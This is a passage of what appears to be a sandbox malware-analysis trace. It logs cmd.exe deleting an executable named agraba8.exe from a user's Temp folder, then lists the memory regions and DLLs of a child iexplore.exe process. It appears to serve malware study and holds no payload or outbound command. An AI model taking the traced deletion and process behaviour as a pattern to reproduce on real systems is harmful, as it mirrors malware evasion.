lpLCData=0x4aa84930, cchData=8 | out: lpLCData=".") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa84920, cchData=8 | out: lpLCData=",") returned 2 [0116.689] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0116.690] GetConsoleTitleW (in: lpConsoleTitle=0x5b3718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x751d0000 [0116.690] GetProcAddress (hModule=0x751d0000, lpProcName="CopyFileExW") returned 0x75203b92 [0116.690] GetProcAddress (hModule=0x751d0000, lpProcName="IsDebuggerPresent") returned 0x751e4a5d [0116.690] GetProcAddress (hModule=0x751d0000, lpProcName="SetConsoleInputExeNameW") returned 0x751fa79d [0116.691] _wcsicmp (_String1="del", _String2=")") returned 59 [0116.691] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0116.691] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0116.691] _wcsicmp (_String1="IF", _String2="del") returned 5 [0116.691] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0116.691] _wcsicmp (_String1="REM", _String2="del") returned 14 [0116.691] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0116.692] GetConsoleTitleW (in: lpConsoleTitle=0x33f9c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.693] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0116.693] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0116.693] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0116.702] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x33f780 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.702] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x33e810 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.702] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x33ea40, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x33ea44, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x33ea40*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0116.702] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0116.702] _wcsicmp (_String1="agraba8.exe", _String2=".") returned 51 [0116.702] _wcsicmp (_String1="agraba8.exe", _String2="..") returned 51 [0116.702] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 0x80 [0116.702] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5a0d38 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.702] SetErrorMode (uMode=0x0) returned 0x8003 [0116.702] SetErrorMode (uMode=0x1) returned 0x0 [0116.702] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", nBufferLength=0x104, lpBuffer=0x33ee64, lpFilePart=0x33ee4c | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", lpFilePart=0x33ee4c*="agraba8.exe") returned 0x30 [0116.703] SetErrorMode (uMode=0x8003) returned 0x1 [0116.703] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010 [0116.703] _wcsicmp (_String1="agraba8.exe", _String2=".") returned 51 [0116.703] _wcsicmp (_String1="agraba8.exe", _String2="..") returned 51 [0116.703] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 0x80 [0116.703] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", fInfoLevelId=0x0, lpFindFileData=0x5b4784, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5b4784) returned 0x5a1268 [0116.703] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 1 [0116.704] FindNextFileW (in: hFindFile=0x5a1268, lpFindFileData=0x5b4784 | out: lpFindFileData=0x5b4784) returned 0 [0116.704] GetLastError () returned 0x12 [0116.704] FindClose (in: hFindFile=0x5a1268 | out: hFindFile=0x5a1268) returned 1 [0116.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.704] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.704] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa841ac | out: lpMode=0x4aa841ac) returned 1 [0116.704] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.704] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa841b0 | out: lpMode=0x4aa841b0) returned 1 [0116.705] SetConsoleInputExeNameW () returned 0x1 [0116.705] GetConsoleOutputCP () returned 0x1b5 [0116.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa84260 | out: lpCPInfo=0x4aa84260) returned 1 [0116.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.705] exit (_Code=0) Process: id = "9" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x208dc000" os_pid = "0x24c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x8e0" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" SCODEF:2272 CREDAT:14337" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1461 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1462 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1463 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1464 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1465 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1466 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1467 start_va = 0x1340000 end_va = 0x13e5fff entry_point = 0x1341c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 1468 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1469 start_va = 0x773b0000 end_va = 0x7752ffff entry_point = 0x773b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1470 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1471 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1472 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1473 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1474 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1475 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1476 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1477 start_va = 0x590000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1478 start_va = 0x73a80000 end_va = 0x73adbfff entry_point = 0x73abf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1479 start_va = 0x73ae0000 end_va = 0x73b1efff entry_point = 0x73b0de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1480 start_va = 0x73b50000 end_va = 0x73b57fff entry_point = 0x73b520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1486 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1487 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1488 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1489 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1490 start_va = 0x74f00000 end_va = 0x74f0bfff entry_point = 0x74f010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1491 start_va = 0x74f10000 end_va = 0x74f6ffff entry_point = 0x74f2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1492 start_va = 0x74f70000 end_va = 0x750cbfff entry_point = 0x74fbba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1493 start_va = 0x750d0000 end_va = 0x7516cfff entry_point = 0x75103fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1494 start_va = 0x751c0000 end_va = 0x751c9fff entry_point = 0x751c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1495 start_va = 0x751d0000 end_va = 0x752dffff entry_point = 0x751e32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1496 start_va = 0x753b0000 end_va = 0x754e5fff entry_point = 0x753b1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1497 start_va = 0x75520000 end_va = 0x755aefff entry_point = 0x75523fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1498 start_va = 0x755d0000 end_va = 0x7567bfff entry_point = 0x755da472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1499 start_va = 0x75780000 end_va = 0x757d6fff entry_point = 0x75799ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1500 start_va = 0x757e0000 end_va = 0x758cffff entry_point = 0x757f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1501 start_va = 0x758d0000 end_va = 0x758dbfff entry_point = 0x758d238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1502 start_va = 0x758e0000 end_va = 0x75adafff entry_point = 0x758e22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1503 start_va = 0x75ba0000 end_va = 0x75c94fff entry_point = 0x75ba1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1504 start_va = 0x75ca0000 end_va = 0x75ce5fff entry_point = 0x75ca7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1505 start_va = 0x75cf0000 end_va = 0x76939fff entry_point = 0x75d71601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1506 start_va = 0x76b20000 end_va = 0x76baffff entry_point = 0x76b36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1507 start_va = 0x76c40000 end_va = 0x76c58fff entry_point = 0x76c44975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1508 start_va = 0x76cf0000 end_va = 0x76e0cfff entry_point = 0x76cf158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1509 start_va = 0x76e10000 end_va = 0x76f0ffff entry_point = 0x76e2b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1510 start_va = 0x76f10000 end_va = 0x76faffff entry_point = 0x76f249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1511 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fb0000" filename = "" Region: id = 1512 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x0 region_type = private name = "private_0x00000000770b0000" filename = "" Region: id = 1513 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1514 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1515 start_va = 0x860000 end_va = 0x9e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1516 start_va = 0x752e0000 end_va = 0x753abfff entry_point = 0x752e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1517 start_va = 0x75b40000 end_va = 0x75b9ffff entry_point = 0x75b5158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1518 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1519 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1520 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0xd0000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1521 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1522 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1523 start_va = 0xa10000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1524 start_va = 0xba0000 end_va = 0xe6efff entry_point = 0xba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1525 start_va = 0x13f0000 end_va = 0x27effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 1526 start_va = 0x721e0000 end_va = 0x72c5ffff entry_point = 0x721e6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 1527 start_va = 0x74050000 end_va = 0x7408bfff entry_point = 0x74053089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1528 start_va = 0x756e0000 end_va = 0x756e4fff entry_point = 0x756e1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1529 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1530 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1531 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1532 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1533 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1534 start_va = 0x74720000 end_va = 0x748bdfff entry_point = 0x7474e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1535 start_va = 0x75700000 end_va = 0x7577afff entry_point = 0x75701aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1536 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 1537 start_va = 0x74c10000 end_va = 0x74c44fff entry_point = 0x74c10000 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll") Region: id = 1538 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1539 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1540 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1541 start_va = 0x738c0000 end_va = 0x7393ffff entry_point = 0x738d37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1542 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1543 start_va = 0x180000 end_va = 0x1edfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1544 start_va = 0x230000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1545 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1546 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1547 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1548 start_va = 0x440000 end_va = 0x51efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1549 start_va = 0x6c0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1550 start_va = 0xe70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 1551 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1552 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1553 start_va = 0x74550000 end_va = 0x7455dfff entry_point = 0x74551235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1554 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1555 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1556 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1557 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1558 start_va = 0x1020000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1559 start_va = 0x2800000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1560 start_va = 0x2910000 end_va = 0x2a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1561 start_va = 0x2b10000 end_va = 0x2d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 1562 start_va = 0x73440000 end_va = 0x73452fff entry_point = 0x73441d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1563 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1564 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1565 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1566 start_va = 0x74bd0000 end_va = 0x74c02fff entry_point = 0x74bd1462 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll") Region: id = 1567 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1568 start_va = 0x2a10000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 1569 start_va = 0x76c60000 end_va = 0x76ce2fff entry_point = 0x76c623d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1570 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1571 start_va = 0x742f0000 end_va = 0x743e4fff entry_point = 0x74300d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1572 start_va = 0x749a0000 end_va = 0x749c0fff entry_point = 0x749a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1573 start_va = 0x75170000 end_va = 0x751b4fff entry_point = 0x751711e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1574 start_va = 0x530000 end_va = 0x54efff entry_point = 0x530000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 1575 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1576 start_va = 0x749d0000 end_va = 0x74a0afff entry_point = 0x749d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1577 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a12dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1578 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1579 start_va = 0x2df0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 1580 start_va = 0x754f0000 end_va = 0x75516fff entry_point = 0x754f58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1581 start_va = 0x755b0000 end_va = 0x755c1fff entry_point = 0x755b1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1582 start_va = 0x76940000 end_va = 0x76adcfff entry_point = 0x769417e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1583 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1584 start_va = 0x2ef0000 end_va = 0x32e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ef0000" filename = "" Region: id = 1585 start_va = 0x74990000 end_va = 0x7499afff entry_point = 0x74991992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1586 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" 